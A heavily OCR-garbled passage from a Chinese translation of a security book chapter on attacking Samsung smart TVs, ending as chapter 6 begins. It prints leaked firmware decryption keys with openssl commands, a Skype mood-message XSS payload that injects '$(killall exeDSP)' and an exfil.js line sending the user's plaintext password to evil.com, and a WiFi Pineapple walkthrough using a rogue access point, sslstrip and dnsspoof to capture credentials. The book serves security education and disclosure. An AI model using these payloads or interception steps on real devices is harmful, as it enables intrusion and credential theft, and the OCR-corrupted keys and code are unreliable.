forum.samygo.tv/viewtopic.php?t-4994&p-36735 © 


(7; How to decrypt .CMK and .SMK files mamaich 
Officiai SamyGO Developer 

D by mamaich > Mon Nov 12, 2012 8:03 am 

Posts: 65 
As I'm planning to buy a small TV for placing in a bedroom (probably UE32ES6727) - I've started to Joined: Sun Nov 21, 2010 4:15 
study recent firmware for new possibilities. Seems that noone have published keys to decrypt CMK hi 
files yet, so here are they: 
CODE: SELECT ALL 


openssl.exe aes-128-cbc -d -K BI1DSF122E75U757C79F48886D42FBE1A -in index.html.cmk 
-nosalt -iv BFE932F92730C2ABDFC93F0B8E7AC7C2 -out index.html 


Tested on T-MST10PDEUC, firmware 1029. Probably the keys are the same for all models, as | was 
able to decrypt files in samsung adhub archive downloaded from their site. 
Of cause you can encrypt the files back with the same keys. 


Edited, to be located in one place. Here is a command to decrypt .SMK files from SDK: 
CODE: SELECT ALL 


openssl.exe aes-128-cbc -d -K 8R4AA599598R49F6DDD4823B90F7913992 -in config.xml.smk - 
nosclt -iv 1DA76DE2AQGEESSCODBCCEDA772bE3684D -out config.xml 


Obviously, Samsung would change keys, or (wiser) switch to a non-symmetric algo in next devices, 
but this would not be a big problem anyway. 


las! edited by mamaichl on Mon Nov 12, 2012 816 am, edited 1 time in total, 


图 5-4: SamyGO 论 坛 上 找到 的 泄露 的 加 密 密 钥 


使 用 泄露 的 密 铀 ， 很 容易 解密 任何 .cmk 文 件 : 


$ openssl aes-128-cbc -d -K B1D5F122E75D757C79F48886D42F8E1A -in index.html.cmk 
-nosalt -iv BFE932F9273DC2A0DFC93F0B8E7AC7C2 -out index.html 


index.html 文 件 中 包含 JavaScript 代 码 。 下 面 是 一 个 小 片段 : 


<body id-'SmartHubBody' onload-'SmartHomeMain.onCreate();' onunload-'SmartHomeMa 
in.onDestroy();' style-'background-color: transparent; width: 1920px; height: 10 
80px; overflow:hiaden; '» 


这 就 给 了 我 们 窥视 三 星 智能 电视 基础 平台 的 机 会 。 系 统 是 基于 Linux 操 作 系统 的 ， 与 其 他 Linux 设 备 在 配置 方面 多 少 有 些 相 似 。 我 们 已 经 看 过 了 exeDSP 可 执行 文件 、 配 置 
文件 和 X11Windows 系 统 。 我 们 还 看 到 另 一 个 实例 ， 密 钥 被 泄露 了 ， 网 上 可 以 在 线 获取 ， 加 密 机 制 被 突破 了 。 通 常 ， 三 星 还 有 其 他 智能 电视 制造 商 ， 以 及 物 联网 设备 生产 商 和 
设计 商 应 该 注意 到 这 一 点 : 即使 他 们 采用 了 好 的 加 密 算 法 ， 也 需要 确保 使 用 的 算法 基于 对 漏洞 的 深刻 理解 。 


5.3.3 ”远程 攻击 三 星 智能 电视 


想象 一 下 ， 如 果 入 侵 者 能 够 远程 攻击 家 中 带 有 视频 摄像 头 的 智能 电视 。 你 的 家 庭 隐私 马上 就 会 处 于 危险 中 。 另 外 ， 私 有 数据 和 运行 于 智能 电视 中 不 同 应 用 程序 里 的 认证 存 
储 也 存在 危险 。 研 究 人 员 Aaron Grattafiori 和 Josh Yavor 在 2013 年 拉 斯 维 加 斯 的 黑 帽 安全 大 会 上 演示 了 这 种 攻击 方法 。 本 节 我 们 来 详细 探讨 一 下 。 


三 星 提供 了 一 些 免费 的 软件 开发 工具 包 以 允许 开发 人 员 编写 自己 的 应 用 程序 。 这 些 应 用 程序 可 以 在 虚拟 机 上 测试 ， 然 后 报 三 星 商店 审核 批准 。 在 三 星 的 网 站 上 (如 图 5-5 
所 示 ) ， 三 星 承诺 “三 星 智能 电视 已 经 对 模块 进行 了 加 密 ， 可 有 效 地 防止 恶意 应 用 程序 运行 ”。 我 们 已 经 看 到 了 加 密 机 制 是 多 么 的 脆弱 ， 加 密 密 钥 已 经 泄露 了 。 此 外 ， 在 下 面 
几 段 话 中 ， 我 们 还 会 看 到 三 星 其 他 的 安全 承诺 同样 不 攻 自 破 。 


www.samsungdforum.com/Support/TVAppsSecurity 


SAMSUNG Eoy FORUM SMART TV FEATURES DOWNLOAD GUIDE C! 


Samsung Tizen TV Brief Guide UX Guideline ^ Development Guide API 


Beginning for Smart TV UX Guideline | Development 4 


Overview 


Samsung Smart TV has security modules to prevent to malicious TV Apps running. 
(Ex.) TV Apps that is sharing paid contents, hacking Inner TV system to get system keys, user data so on. 


图 5-5: 三 星 网 站 上 给 开发 人 员 的 安全 承诺 
三 星 调用 应 用 程序 部 件 ， 每 一 个 小 部 件 的 目录 中 都 有 如 下 文件 ， 在 SDK 包 含 的 样 例 中 ， 我 们 很 容易 看 到 文件 的 示例 : 


config.xml 


一 个 简单 的 XML 文件 ， 定 义 并 说 明了 应 用 的 各 种 属性 。 
index.html 

应 用 程序 的 主要 入 口 点 。 该 文件 通常 包含 一 个 JavaScript 文 件 ， 该 JavaScript 文 件 包含 了 大 多 数 的 应 用 程序 代码 。 
Javascript file (js) 

该 文件 包含 了 应 用 程序 的 代码 。 
Main.css 

样式 表 ， 定 义 了 控件 的 外 观 和 应 用 的 格式 。 


Grattafiori 和 Yavor 从 config.xm 人 配置 文件 中 看 到 ， 在 三 星 智能 电视 中 有 一 个 Skype 应 用 程序 : 


«widget» 

«category»lifestyle«/category» 

«autoUpdate»y«/autoUpdate» 

«cpname»Skype«/cpname» 

«login»n«/login» 

«ver»2.120601«/ver»y 

«mgrver»2.305«/mgrver» 

«emp»empSkype: : empCamera«/emp» 

«tfullwidget»y«/fullwidget» 

«widgetname»Skype«/widgetname» 

X«description»Skype application«/description»«runTitle»Skype«/runTitle» 
«author» 

«name»Samsung Electronics Co. Ltd.«/name»«link»http://www.Sec.co.kr/«/link» 
«organization»Samsung Electronics Co. Ltd.«/organization»«/author» 
«/widget» 


有 趣 的 是 ， 名 称 和 公司 都 写 的 是 三 星 ， 其 实 是 Skype 提 供 的 代码 。 这 就 说 明 是 Skype 向 三 星 提供 了 二 进 制 代 码 和 库 文 件 ， 但 由 三 星 工 程 师 开发 并 整合 了 主要 功能 。 


下 边 是 skype 应 用 程序 的 index.html 文 件 : 


«html» 
«head» 


«meta http-equiv-"Content-Type" content-"text/html"» 

«title»2011 MoIP Widget«/title» 

<script type-"text/javascript" src-"SMANAGER WIDGET/Common/API/Widget.js"» 

</script> 

<script type-"text/javascript" src="$MANAGER WIDGET/Common/core.js"></script> 

<OBJECT id-"pluginObjectAppCommon Skype" border-0 classid-"clsid:SAMSUNGINFOLINK- 
APPCOMMON" style-"display:block; width:0px;height:0px; "2«/OBJECT» 

«OBJECT id-"EmpSkype" border-0 classid-"clsid:SAMSUNG-INFOLINK-SEF"»«/OBJECT» 

</head> 

<body> 

<script type-"text/javascript" language-"javascript" src="$MANAGER WIDGET/Common/ 
IME/ime2.js"» B 

</script> 

</body> 

</html> 


在 分 析 Skype 应 用 程序 时 ，Grattafiori 和 Yavor 发 现在 javascript 程 序 中 有 如 下 一 小 段 代 码 : 


PluginAPIMgr.GetMyStorageInfo = function() 

{ 

alert ("PluginAPIMgr.GetMyStorageInfo"); 

var result = this.ExWidgetInterfacePlugin.Execute ("ReadWidgetData 


", "SkypeInfo"; return result; 
} 


在 JavaScript 程 序 中 ，alert 函 数 用 于 弹出 一 个 对 话 框 ， 可 以 显示 传递 给 该 函数 的 参数 。 然 而 ， 本 例 中 ， 三 星 电视 将 指定 的 字符 串 作为 日 志 写 到 了 一 个 本 地 文件 中 。 研 究 人 
RRI, OEREN EA JavaScript 能 够 操控 本 地 文件 和 执行 系统 操作 。 这 就 有 趣 了 ， 因 为 JavaScript 代 码 是 运行 在 典型 的 web 浏 览 器 中 的 ， 
允许 执行 这 类 系统 级 别 的 操作 (在 没有 明确 调整 的 情况 下 ) 。 这 就 意味 着 : 简单 的 应 用 程序 漏洞 会 产生 远程 可 以 利用 的 漏洞 。 


流行 的 XSS ( 跨 站 攻击 脚本 (Cross Site Scripting) ) 攻击 向 量 通常 就 依赖 那些 web 应 用 程序 无 法 验证 的 HTML 字 符 (如 <、>、 ma 反 过 来 允许 攻 击 者 注入 下 总 的 
Javascript 代 码 。 与 XSS 攻 击 非常 相似 ， 研 究 人 员 发 现在 mood 消 息 中 存在 验证 漏洞 。Skype 的 mood 消 息 是 基本 状态 消息 ， 比 如 “今天 只 是 喝 咖 啡 ， 有 点 紧张 ! (Just had 
coffee, a little jittery today! ) ， 或 者 “我 现在 不 在 ， 无 法 马上 回复 ， 请 稍 等 ! ” (Out and about, may not respond immediately so be patient! ) 。 现 在 ， 想 象 一 
下 如 下 所 示 的 mood 消 息 : 


<script src-"http://tv.isecpartners.com/reboot.js"»«/script» 


假如 某 人 在 Skype 上 给 你 发 送 一 条 mood 消 息 。 你 希望 应 用 程序 实际 显示 mood 消 息 为 : «script src-"http://evil.com/reboot.js"» </script>。 但 是 ，Skype 应 用 程序 实 
际 上 将 其 中 的 字符 串 作 为 代码 执行 了 。 这 就 导致 了 Skype 应 用 程序 会 获取 reboot:js 文 件 ， 处 理 其 中 的 代码 ! 现在 ， 想 象 一 下 ， 如 果 reboot.js 文 件 的 内 容 如 下 所 示 : 


fileobject = document.createElement ('object'); 
fileobject.setAttribute ("id", "pluginObjectFile"); 
fileobject.setAttribute ("classid", "clsid:SAMSUNG-INFOLINK-FILESYSTEM"); 
document.getElementsByTagName ("body" [0] . appendChild(fileobject); 
filePlugin = document.getElementById('pluginObjectrile'); 


// Kill exeDSP, forcing reboot 
filePlugin.Copy("/proc/self/cmdline", "X$(killallexeDSP) /tmp/foo"); 


注意 filePlugin.Copy 的 参数 。Grattafiori 和 Yavor 指 出 : 可 以 注入 killallexeDSP 指 令 作 为 一 个 参数 ， 从 而 致使 电视 重启 ， 因 为 exeDSP 进 程 要 处 理 所 有 的 功能 。 这 实际 上 是 
三 星 修改 JavaScript 解 释 器 所 造成 的 一 个 安全 bug.。 


研究 人 员 进 一 步 展示 了 恶意 的 Skype 用 户 可 能 会 提交 的 一 个 mood 消 息 : 
«script src-"http://tv.isecpartners.com/exfil.js"»«/script» 
假定 exfiljs 包 含 如 下 的 Javascript 代 码 : 


creds = PluginAPIMgr.GetMyStorageInfo(); 
new Image ().src-"http://evil.com/"*creds; 


研究 人 员 发 现 ，GetMyStoragelnfo () 函数 实际 上 以 明文 的 方式 返回 用 户 的 Skype 密 码 。 然 后 ， 这 一 恶意 代码 会 将 用 户 名 密码 作为 参数 发 送 到 evil.com 服 务 器 。 控 制 
evil.com 的 攻击 者 ， 查 看 web 服 务 器 的 日 志 就 会 注意 到 密码 。 这 时 ， 攻 击 者 可 以 快速 地 登录 Skype， 并 劫持 受害 人 的 账号 。 


Grattafiori 和 Yavor 发 现 了 好 几 处 可 以 利用 的 ， 并 与 Skype 有 关 的 这 类 漏洞 。web 浏 览 器 设计 人 员 深 知 要 将 类 似 Javascript 代 码 这 样 的 客户 端 代码 置 入 沙 箱 中 ， 要 遵从 同 源 
策略 (same-origin policy) 。 这 是 web 安 全 领域 最 基本 的 众所周知 的 安全 理念 。 三 星 的 产品 实现 方案 违背 了 这 一 最 基本 的 安全 原则 。 从 外 部 域 加 载 进来 的 Javascript 代 码 不 
应 当 使 用 与 本 地 文件 系统 加 载 的 代码 相同 的 权限 执行 。 进 一 步 讲 ， 为 引入 自 定义 的 功能 对 JavaScript 解 释 器 的 调整 要 非常 小 心 ， 确 保 设计 不 会 产生 安全 bug。 从 这 个 例子 中 我 
们 得 到 的 教训 是 : 类 似 数 据 有 效 性 和 坚持 同 源 策略 这 些 安全 基础 是 最 基本 的 安全 需求 ， 应 当 被 加 入 到 智能 电视 和 其 他 物 联网 设备 的 设计 理念 当中 去 。 并 没有 多 么 复杂 的 攻击 手 
段 ， 都 是 一 些 基本 的 十 多 年 来 业界 熟知 的 攻击 向 量 。 


其 他 研究 人 员 还 发 现 : 三 星 还 有 其 他 几 处 违反 基本 安全 机 制 的 漏洞 ， 比 如 输入 验证 漏洞 。 值 得 注意 的 一 个 研究 人 员 是 Seungjin Lee 和 Seungjoo Kim, 464148 E JL T 2 Ab 
三 星 产品 的 漏洞 。 他 们 的 研究 内 容 值得 研究 ， 可 以 在 网 上 找到 。 


类 似 三 星 这 样 的 物 联网 制造 商 ， 需 要 在 贯彻 这 些 基 本 原则 上 做 得 更 好 ， 以 保护 他 们 的 业务 和 合法 用 户 的 隐私 。 如 此 简单 的 攻击 就 可 以 在 智能 电视 上 安装 一 个 可 持久 利用 的 
后 门 ， 人 允许 攻击 者 持续 不 断 窃取 用 户 认证 信息 ， 过 电视 上 的 视频 摄像 头 (如 果 有 的 话 ) 观测 到 用 户 的 房屋 环境 。 这 类 攻击 可 能 会 危及 整个 家 庭 的 隐私 。 智 能 电视 和 其 他 
物 联网 设备 制造 商 必须 认识 到 问题 的 严重 性 ， 努 力 加 强 安全 措施 ， 纠 正业 界 过 去 已 经 发 现 的 错误 


5.4 ”检查 你 自己 的 智能 电视 (和 其 他 物 联 网 设备 ) 


可 能 你 自己 就 有 一 台 智 能 电视 ， 或 者 能 接触 到 智能 电视 。 除 了 有 意识 地 注意 到 目前 为 止 的 安全 研究 内 容 之 外 ， 还 有 一 个 好 主意 就 是 深入 检查 与 智能 电视 互联 的 网 络 流量 。 
这 可 以 使 你 对 智能 电视 的 安全 有 更 深入 的 理解 ， 并 有 机 会 修补 系统 ， 甚 至 可 能 发 现 新 的 漏洞 报告 给 厂商 。 


5.4.1 来 了 解 一 下 WiFi Pineapple Mark V 吧 


Mark V 型 WiFi Pineapple 是 一 款 很 棒 的 设备 (如 图 5-6 所 示 ) 。 捕 获 网 络 流量 往往 是 一 件 很 麻烦 的 事情 ， 因 为 这 需要 下 载 不 同 款 的 工具 和 虚拟 机 映像 竺 软件。 另外， 还 需 
要 对 这 些 工 具 做 额外 的 配置 ， 这 会 花费 很 多 时 间 和 金钱 。WiFi Pineapple 是 一 个 全 功能 的 产品 ， 它 以 WiFi 接 入 点 的 方式 允许 用 户 轻松 捕获 网 络 流量 ， 并 执行 不 同类 型 的 网 络 攻 
击 。 上 网 就 可 以 买 到 该 产品 。 


图 5-6: Mark V 型 WiFi Pineapple 


在 我 们 的 场景 ， 将 使 用 如 下 三 个 设备 : 
: 一 台 笔 记 本 电脑 ， 使 用 以 太 网 端口 接 入 互联 网 
- 一 个 Matk V 型 WiFi Pineapple， 通 过 网 线 接 到 笔记 本 上 
: 一 台 智能 电视 ， 接 入 到 WiFi Pineapple 提 供 的 无 线 网 环境 中 


首先 ， 我 们 要 配置 Mark V 型 WiFi Pineapple， 使 用 以 太 网 网 线 接 入 到 笔记 本 电脑 上 。 设 置 需要 使 用 浏览 器 访问 http://172.16.42.1:1471， 之 后 我 们 会 看 到 如 图 5-7 所 示 的 
内 容 。 

mut "Continue" ， 会 提示 你 选择 一 个 WiFi Pineapple 密 码 。 确 保 使 用 一 个 强 的 复杂 密码 。 否 则 ， 你 周围 的 人 就 有 可 能 接 入 到 WiFi Pineapple 上 ， 对 你 的 数据 或 其 他 设 
备 造成 威胁 。 

当 你 点 击 “Set Password" 之后，Pineapple 就 会 重启 。 几 分 钟 后 ， 点 击 出 现在 页 面 上 的 “Continue” 链 接 。 这 时 会 出 现 一 个 登录 界面 ， 你 需要 输入 刚刚 创建 的 密码 。 
认证 成 功 之 后 ， 你 就 会 看 到 如 图 5-8 所 示 的 主 界面 了 。 


o (T 172.16.42.1:1471 , ! 


Welcome to your WiFi Pineapple. 
Find support, infusions, news and forums at WiFiPin 


图 5-7: 设置 界面 


© < E 172.16.42.1:1471/4 c 由 B 


00:04:59 up 6 min, load average: 0.14, 0.19, 0.10 


LT ELE 
Autostart: Refresh this tile to check for 
system updates. 


| | MK5 Karma " No log file is being followed. To 
Firmware Version: 1.2.0 | Autostart 。 follow a custom logfile here, 
| open the large tile. 
Refresh this tile to check for | 
firmware upgrades. 


Wlan) Enabled. Disable 

Wlanl " Enable 

Mem: 

-/* buffers: 
Swap: 


Internet IP: Show 


|| 
| 
LAN: 172.16.42.1 | 
Wilani: N/A 
Mobile: N/A 
| 
1 


图 5-8: 登录 之 后 的 主 界面 


接 下 来 ， 修 改 WiFi 网 络 默认 名 称 ( 改 成 Trust Me) 。 要 完成 这 一 步 ， 点 击 “Karma Configuration" ， 然 后 选择 “Karma” ， 在 SSID 处 输入 Trust_ Me。 然后 


Fi "Update" (如 图 5-9 所 示 ) 。 


我 们 假定 笔记 本 电脑 运行 的 是 Linux 操 作 系统 。 下 一 步 就 是 设置 网 络 共享 连接 ， 
成 这 一 步 的 说 明 可 以 通过 网 络 查询 。) 


目的 是 让 Pineapple 能 够 访问 笔记 本 电脑 所 在 的 网 络 。 (在 不 同 操作 系统 上 如 何 使 用 指令 


eoe «x 172.16.42.1:1471/4 


00:46:11 up 47 min, load average: 0.04, 0.13, 0.15 


Karma intelligence Report | Karma Log | Karma Configuration 


Karma Configuration 


SSID Configuration 


Persistent: B 


图 5-9: 修改 WiFi 网 络 默认 名 称 


在 Linux 笔 记 本 电脑 上 ， 我 们 要 下 载 互 联网 连接 共享 脚本 : 


$ wget http://wifipineapple.com/wp5.sh 
接 下 来 ， 我 们 设置 脚本 为 可 执行 ， 然 后 运行 脚本 : 


$ sudo ./wp5.sh 
[sudo] password for apple: 


N TEMMES "WO 2  2 EM 
IM IP Till U UU. 9 W AFP X 
INR FS 9$. FRA faJri 4 


LUISA AU JUR doy — AJ B£SYXA JA c ud eu 4 
OWN the Network LO" | v2.2 


Pineapple Netmask [255.255.255.0]: 
Pineapple Network [172.16.42.0/24]: 
Interface between PC and Pineapple [etho]: 


dii 


Interface between PC and Internet [wlano]: 
Internet Gateway [192.168.231.2]: 

IP Address of Host PC [172.16.42.42]: 

IP Address of Pineapple [172.16.42.1]: 


m" mu \||/ Internet: 192.168.231.2 - wlanO 
( _) <--> [. ] <--> ,<><>, Computer: 172.16.42.42 
C Q y b X '«»«»' Pineapple: 172.16.42.0/24 - ethO 


Browse to http://172.16.42.1:1471 


这 里 ， 我 们 使 用 脚本 的 默认 选项 。 这 时 ，Pineapple 就 接 入 到 互联 网 了 。 接 下 来 ， 我 们 配置 智能 电视 ， 将 其 接 入 到 Trust_Me 网 络 中 (请 参考 智能 电视 使 用 手册 中 关于 如 何 
选择 特定 WiFi 网 络 的 内 容 ) 。 类 似 图 5-10 所 示 的 例子 。 


Network Settings 


Select your network type. 


Network type 


Wireless network 


图 5-10: 配置 智能 电视 接 入 到 Pineapple 上 
现在 ， 所 有 流 经 电视 的 网 络 流量 都 必须 通过 Pineapple。 


由 于 Trust_ Me 网络 并 不 是 一 个 被 密码 保护 的 网 络 ， 因 而 周围 的 任何 人 都 可 以 连 进来 ， 捕 获 接 入 到 Pineapple 的 智能 电视 的 网 络 流量 ， 或 者 接 入 到 Pineapple 的 其 他 设备 的 


流量 。 


5.4.2. TRERUE-SRDIRS T LS 


本 节 ， 我 们 来 描述 一 下 sslstrip 工 具 。 该 工具 重 定向 安全 网 站 并 帮助 执行 一 个 链接 实施 中 间 人 攻击 。 例 如 ， 如 果 你 要 登录 Facebook， 最 有 可 能 是 在 浏览 器 中 输入 
facebook.com (安全 的 做 法 是 输入 https://facebook.com 请 求 访问 传输 加 密 版 本 (TLS-encrypted) 的 网 站 ， 但 是 用 户 一 般 不 这 么 做 ) 。 我 们 使 用 telnet 客 户 端 看 看 当 浏览 
器 连 入 facebook.com 时 ， 会 发 生 什 么 : 


$ telnet www.facebook.com 80 

Trying 31.13.76.102http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/... 
Connected to star.clOr.facebook.com. 

Escape character is '^]'. 

GET / HTTP/1.0 

Host: www.facebook.com 


HTTP/1.1 302 Found 

Location: https://www.facebook.com/ 
Content-Type: text/html; charset-utf-8 
Date: Tue, 09 Dec 2014 04:46:59 GMT 
Connection: close 

Content-Length: 0 


Connection closed by foreign host. 


这 时 ， 浏 览 器 重 定向 到 安全 的 传输 层 加 密 版 的 网 站 上 ， 之 后 用 户 登 录 。sslstrip 工 具 拦截 该 重 定向 ， 不 会 向 浏览 器 发 送 任何 以 https 开 头 的 链接 。 它 还 代理 服务 器 之 间 的 请 
求 一 一 比如 ， 它 使 用 传输 层 加 密 协 议 连 到 客户 端 (facebook.com) 。 要 做 到 这 一 点 ， 我 们 需要 将 sslstrip 安 装 到 介 于 受 攻击 对 象 和 访问 目标 之 间 的 设备 上 。 这 也 正 符合 我 们 当 
前 的 情况 : 智能 电视 连接 到 Pineapple， 我 们 能 够 完全 掌控 Pineapple。 


本 节 的 目的 是 演示 如 何 配置 Pineapple， 初 步 捕 获 智能 电视 的 网 络 流量 ， 因 而 我 们 让 智能 电视 接 入 到 捕获 流量 的 设备 上 。 然 而 ， 有 些 智能 电视 周围 的 人 可 能 会 使 用 
Pineapple 广 播 一 个 “ 假 的 ”与 电视 接 入 的 网 络 同名 的 无 线 网络 。 这 就 会 炊 骗 电视 接 入 到 Pineapple 中 ， 而 不 是 接 入 到 合法 的 无 线 访问 节点 上 。 可 以 使 用 Karma 内 广 工 具 达 到 这 一 


目 。 网 上 可 以 查 到 相关 的 命令 细节 。 


我 们 在 Pineapple 上 启用 sslstrip。 在 主 界面 上 ， 点 击 “Pineapple Bar” 并 选择 “Pineapple Bar: Available tab”。 点 击 “Show next to the User Infusions 
section”。 你 就 会 看 到 一 个 填充 列表 (这些 都 是 其 他 用 户 为 Pineapple 增 加 的 补充 功能 ) 。 然 后 点 击 sslstrip entry 右 边 的 “Install”。 点 击 “Install to internal storage" , 
现在 ， 回 到 主 界面 你 就 会 看 到 一 个 含有 sslstrip 命 令 的 新 框图 了 (如 图 5-11 所 示 ) 。 


sslstrip 


sslstrip x | Start B verbose 


sslstrip is not running... 


图 5-11: sslsttip 已 经 安装 到 Pineapple 上 了 


点 击 “Start” 然 后 点 链接 sslstrip， 看 看 输出 结果 是 什么 。 在 智能 电视 上 ， 打 开 web 浏 览 器 (大 多 数 智能 电视 默认 都 带 有 浏览 器 ， 查 看 一 下 你 的 电视 指令 ) ， 定 位 
到 http://gmail.com。 邮 件 地 址 和 密码 随便 输入 什么 ， 然 后 点 击 “Sign in”。 当 然 ， 登 录 肯 定 会 失败 ， 但 是 注意 浏览 器 的 地 址 栏 。URL 仍 然 是 以 http 的 形式 给 出 的 〈 如 图 5- 
12 所 示 ) 。 在 没有 连 入 Trust_Me 网 络 的 笔记 本 电脑 上 尝试 上 面 的 步骤 ， 你 会 被 重 定向 到 一 个 https 链 接 。 这 就 是 sslstrip 所 做 的 工作 。 


@ http://accounts.google.com/ServiceLoginAuth 


oogle 


One account. All of Google. 


Sign in to continue to Gmail 


blah 


The email or password you entered is incorrect 


图 5-12: 试图 登入 智能 电视 


在 你 的 Linux 笔 记 本 电脑 上 ， 你 会 在 sslstrip 的 输出 中 看 到 真实 捕获 的 认证 信息 (如 图 5-13 所 示 ) 。 


05:33:47 up 2:47, load average: 1.60, 0.88, 0.48 


sslstrip - v2.0 


Dependencies 
sslstrip 

Controls 

sslstrip » | Stop BI verbose 
Configuration 

Autostart | Enable 


Output BEOTICIS MEI MEUSE TTE DE 


[Refresh] Filter 


commands used to filter output (e.g. grep, awk) 


图 5-13: 捕获 认证 


要 保护 sslsttip， 服 务 器 可 以 启用 HTTP 强 制 传输 安全 协议 (HSTS) 。 它 会 让 服务 器 的 HTTP 头 都 含有 字符 串 Strict-Transport-Security。 当 浏览 器 看 到 这 个 字符 串 ， 它 就 会 
记得 一 定 要 使 用 TLS 连 接 。 缺 点 是 : 如 果 sslstrip 是 首次 运行 的 话 ， 浏 览 器 不 知道 必须 使 用 TLS， 攻 击 者 就 会 阻止 该 HTTP 头 传递 过 来 。 为 了 解决 这 一 问题 ， 有 些 浏览 器 (3e 


Chrome 和 Firefox) 将 一 些 知 名 的 域名 预先 加 载 ， 强 制 浏览 器 总 是 使 用 TLS 连 接 这 些 域名 。 


Pineapple 对 于 连 入 网 络 的 物 联网 设备 来 讲 ， 是 一 款 很 有 用 的 设备 。 我 们 来 看 看 还 有 没有 其 他 可 以 免费 使 用 的 功能 。 比 如 ， 当 电视 查询 本 地 服务 器 域名 时 ， 你 可 以 使 用 


dnsspoof 向 电视 发 送 任意 IP 地 址 (比如 ， 你 安装 了 一 个 本 地 web 服 务 器 ， 地 址 是 192.168.1.1， 当 电视 查询 google.com 域 名 对 应 的 IP 地 址 时 ， 你 可 以 将 本 地 服务 器 IP 地 址 发 送 
给 它 ) 。 本 章 的 标题 是 “攻击 智能 电视 ”，Nikos Sidiropoulos 和 Periklis Stefopoulos 发 现 他 们 的 智能 电视 通过 连接 至 az43064.vo.msecnd.net 下 载 固件 更 新 。 他 们 在 笔记 本 
上 设置 了 一 台 含有 同样 固件 文件 的 本 地 服务 器 ， 并 且 将 az43064.vo.msecnd.net 指 向 笔记 本 电脑 的 |P 地 址 ， 看 看 智能 电视 是 否 会 从 本 地 笔记 本 电脑 上 下 载 固件 。 这 是 一 个 很 有 
趣 的 测试 ， 它 可 以 检查 电视 是 否 包含 什 么 静态 的 可 信任 服务 器 的 域名 指向 (事实 上 没有 ) 。 如 果 你 碰 到 这 种 情况 ， 并 且 没有 直接 访问 电视 文件 系统 的 权限 (有 权限 的 话 就 可 以 
创建 静态 域名 指向 ) ， 你 就 可 以 使 用 dnsspoof 来 测试 一 下 。 


也 可 以 使 用 tcpdump 工 具 轻 松 捕获 网 络 流量 (也 可 以 使 用 Wireshark) 。 这 款 工具 常用 于 测试 应 用 程序 的 不 同 功能 和 逆向 工程 。 当 然 这 不 限于 应 用 在 智能 电视 上 。 也 可 以 
用 到 其 他 物 联网 设备 上 ， 看 看 你 能 发 现 什么 。 很 有 趣 的 ! 


55 小 结 


经 过 讨论 ， 我 们 学 到 了 智能 电视 是 成 熟 的 Linux 设 备 。 这 些 设备 不 断 地 增加 家 庭 和 办 公 环 境 中 的 无 线 端 点 的 数量 ， 而 且 我 们 指望 它们 是 安全 的 。 智 能 电视 制造 商 也 希望 生 
产 出 安全 的 设备 ， 不 被 轻易 纂 改 ， 以 此 保护 商业 利益 。 三 星 是 最 知名 的 智能 电视 制造 商 之 一 ， 正 如 本 章 所 描述 的 ， 在 安全 方面 他 们 没有 开 一 个 好 头 。 


在 传统 应 用 程序 安全 领域 ,我 们 已 经 学 会 了 如 何 正 确 使 用 加 密 方法 ， 包 括 注意 进行 输入 验证 等 一 些 基本 的 原则 。 我 们 还 了 解 到 : 要 注意 web 设 计 ， 严 格 禁 止 跨 源 策 略 。 对 
于 大 多 数 开 发 者 来 讲 ， 如 何 实现 这 些 基本 的 安全 是 常识 性 问题 。 然 而 ， 像 三 星 这 样 的 制造 商 在 产品 安全 方面 并 没有 尽 到 责任 。 导 致 出 售 的 数 以 百 万 计 可 以 连 入 互联 网 的 智能 
视 有 可 能 遭受 黑客 的 攻击 (很 多 智能 电视 具有 自动 更 新 功能 ， 这 是 一 种 改观 ， 但 是 攻击 者 还 是 会 使 用 一 些 手段 来 禁用 自动 更 新 ) 。 攻 击 者 可 以 利用 当前 这 样 一 种 状况 ， 借 助 于 
智能 电视 攻击 本 地 网 络 中 的 其 他 物 联网 设备 (或 者 其 他 的 第 三 方 设 备 ) 。 


攻击 者 可 以 利用 连 入 电视 的 摄像 机 ， 偷 寅 个 人 隐私 ， 但 这 不 仅 限于 黑客 ， 隐 私 问题 还 依赖 于 系统 是 如 何 设计 的 。 在 一 篇 名 为 “我 害怕 我 的 新 电视 ” (I m terrified of 
my new TV) 的 文章 中 ， 作 者 Michal Price 讲 述 了 他 的 智能 电视 具有 语音 识别 特性 ， 还 有 个 警告 的 法 律 协议 : “请 注意 ， 如 果 你 说 的 话 中 含有 个 人 隐私 或 其 他 敏感 信息 ， 这 些 
信息 有 可 能 在 数据 中 被 捕获 并 发 送 给 第 三 方 ”。 换 句 话 说， 通过 电视 麦克 风 收 集 到 的 语音 数据 是 通过 互联 网 上 的 一 台 外 部 服务 器 进行 处 理 的 。 这 就 意味 着 ， 第 三 方 是 可 以 获取 
我 们 讲话 的 音频 数据 的 。 苹 果 的 Siri 也 是 这 么 做 的 。 一 些 家 庭 和 企业 会 对 启用 这 样 的 功能 感到 不 安 。 然 而 ， 还 有 很 多 人 并 没有 意识 到 背后 的 危险 。 此 外 ， 我 们 并 不 清楚 服务 提 
供 商 是 如 何 确保 服务 器 上 捕获 到 的 语音 信息 不 被 入 侵 人 员 获取 。 重 要 的 是 ， 智 能 电视 生产 商 需要 明确 他 们 的 责任 ， 预 先 计 划 ， 尽 到 他 们 的 义务 并 证 明 给 用 户 看 ， 这 样 用 户 才能 
做 出 他 们 自己 的 选择 。 


网 络 安全 这 个 职业 正 蓬勃 发 展 ， 研 究 人 员 (如 本 章 提 及 的 ) 正在 忽而 不 舍 地 发 现 并 报告 安全 问题 ， 这 给 智能 电视 提供 者 施加 了 一 定 的 压力 以 确保 平台 安全 。 以 一 种 积极 的 
方式 ， 为 增强 用 户 防范 潜在 风险 的 意识 和 选择 产品 方面 提供 了 很 好 的 帮助 。 电 视 机 是 咱们 生活 中 四 处 可 见 的 一 块 屏 幕 ， 一 时 半 会 儿 也 不 可 能 就 这 么 消失 。 接 下 来 的 几 年 ， 会 有 
更 多 的 智能 电视 。 我 们 会 享受 它们 带 来 的 新 特性 。 通 过 将 生产 商 和 用 户 推 向 一 个 正确 的 方向 ， 我 们 希望 未 来 我 们 的 玻璃 板 旅程 尽 可 能 安全 可 靠 。 


第 6 章 ”联网 汽车 的 安全 性 分 析 一 一 从 燃油 汽车 到 全 电动 汽 


2014 年 ， 一 位 来 自 塞拉利昂 的 医生 和 一 位 来 自 利比亚 的 游客 分 别 在 美国 内 布 拉 斯 加 州 和 德 克 萨 斯 州 的 达拉斯 死 于 致命 的 埃 博 拉 病毒 。 这 引起 了 美国 媒体 的 疯狂 报道 ， 很 多 
